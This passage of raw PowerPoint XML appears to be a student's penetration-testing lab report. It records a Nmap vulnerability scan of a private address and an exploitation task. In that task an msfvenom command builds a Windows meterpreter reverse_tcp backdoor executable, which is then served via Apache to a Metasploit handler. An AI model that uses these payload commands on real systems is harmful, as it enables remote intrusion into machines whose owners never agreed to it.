      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A computer screen shot of a black screen&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F0A834-7A27-37C8-C129-514AC1E8DF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93930" y="1250348"/>
            <a:ext cx="3419533" cy="1923487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A computer screen shot of a black screen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{565CA0A6-13C5-FAE5-CDDD-4585D85299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79158" y="3429000"/>
            <a:ext cx="5156187" cy="2887465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB6FE77C-938E-3DC5-CF90-6EEA8A797513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3174304901"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038603" y="263322"/>
          <a:ext cx="8128001" cy="91440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655890009"/>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this slide are same commands, but from Swansea server to London server, with same problem in topology.</a:t>
                      </a:r>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="630318201"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36019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ACA49-5836-D6D0-5205-8C559E0D0804}"/>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4600" dirty="0"/>
              <a:t>Task 2: Vulnerability assessment screenshot highlight low, medium and high severity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22"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89B71B29-267C-1CC0-3422-BAF635CE1B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040" y="2133271"/>
            <a:ext cx="5614416" cy="3158109"/>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19FABD5A-6E9E-1F09-CBD7-1D8D9CAF30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54496" y="2722784"/>
            <a:ext cx="5614416" cy="1979081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A9121D5-AC94-44EB-20A0-CC9C8A9AD5FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1042717135"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2190495" y="5374639"/>
          <a:ext cx="8128001" cy="228600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839915593"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1979081">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t>I am using Nmap to scan vulnerability </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t>I am </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1"/>
                        <a:t>runing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t> command from KALI Linux: Nmap –</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1"/>
                        <a:t>sS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t> –</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1"/>
                        <a:t>sV</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t> –o –p- 192.168.1.1 (first screenshot) and results</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t>On the second screenshot underline with red: High severity, with yellow: Medium severity and green: Low severity</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t>2 High: 389/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1"/>
                        <a:t>tcp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t> and 449/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1"/>
                        <a:t>tcp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t>, 2 Medium: 88/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1"/>
                        <a:t>tcp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t> and 464/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1"/>
                        <a:t>tcp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t>, 2 Low: 7/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1"/>
                        <a:t>tcp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t> and 9/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1"/>
                        <a:t>tcp</a:t>
                      </a:r>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1451222584"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2763614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C98A213-5994-475E-B327-DC6EC27FB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BE5B4-292C-8B95-CC5F-ED7368762AA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638881" y="670218"/>
            <a:ext cx="10909640" cy="1065836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6100" dirty="0"/>
              <a:t>Task 3: Exploitation  with Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="sketch line">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B030A0D-0DAD-4A99-89BB-419527D6A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9376" y="1800088"/>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81FC8D22-B070-2452-1A8E-E817D605DB7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2608" y="2512543"/>
            <a:ext cx="3758184" cy="2123373"/>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9225C3CF-7986-05F1-9A4B-F9F85BE5DF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43400" y="2521937"/>
            <a:ext cx="3758184" cy="2113979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A screenshot of a computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E10DF8-D170-B335-9FB1-E27D605064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66176" y="2512543"/>
            <a:ext cx="3758184" cy="2113979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DE557A0-5602-E489-3F61-AF2427C59B03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300134897"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2317136" y="5123935"/>
          <a:ext cx="8128001" cy="173736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4083278021"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="11125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solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>On the first screenshot run: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Msfvenom</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> – p windows/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>meterpreter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>reverse_tcp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> LHOST=192.168.1.10 LPORT=12345 -f exe -o windowsbackdoor.exe</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>On the second screenshot I am giving permissions: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Chmod</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> +x windowsbackdoor.exe</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>I</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>n the third screenshot I‘m </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>starting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="bg-BG" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>APACHE server</a:t>
                      </a:r>
                      <a:endParaRPr lang="bg-BG" sz="1800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1090854025"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373764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creenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BE11390-EFD5-ECA3-3446-6C0B48FB4184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="67198" b="1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4690386" y="572921"/>
            <a:ext cx="2685299" cy="4604800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16">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screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C654B66-91BA-0189-6C4A-C66601EEDCDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="66991" b="1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8887271" y="572921"/>
            <a:ext cx="2702245" cy="4604800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18">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descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9DEDCA1-2379-EE1F-AB3E-C9AE85D800AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="67247" b="1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="602485" y="572921"/>
            <a:ext cx="2743238" cy="4711194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Table 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0638497-9AA1-8B7B-9EC3-67D37A786162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1968090023"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2513781" y="5429318"/>
          <a:ext cx="8128001" cy="1737360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8128001">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3237582997"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="749765">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0"/>
                        <a:t>On the first and second screenshot I am starting Metasploit and I am using exploit to perform a security breach</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="bg-BG" dirty="0"/>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>I define the same type of useful resource that I defined earlier in my backdoor.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>In third screenshot </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>I check the options using the display options.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="bg-BG" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2958761338"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1675895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ight Triangle 24">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computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46672101-5E5A-22B4-F09B-3205D9F1ADAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="20957" r="29043"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1873653" y="918546"/>
            <a:ext cx="4426073" cy="4979334"/>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30272FE7-3D6E-87F9-FC9D-7E498942104C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="50000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729606" y="918546"/>
            <a:ext cx="4426073" cy="3856654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Table 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F38A0A82-4D34-2453-9916-5F854938E0BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1824631847"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3881120" y="6069598"/>
          <a:ext cx="8127999" cy="640080"/>
        </p:xfrm>
        <a:graphic>
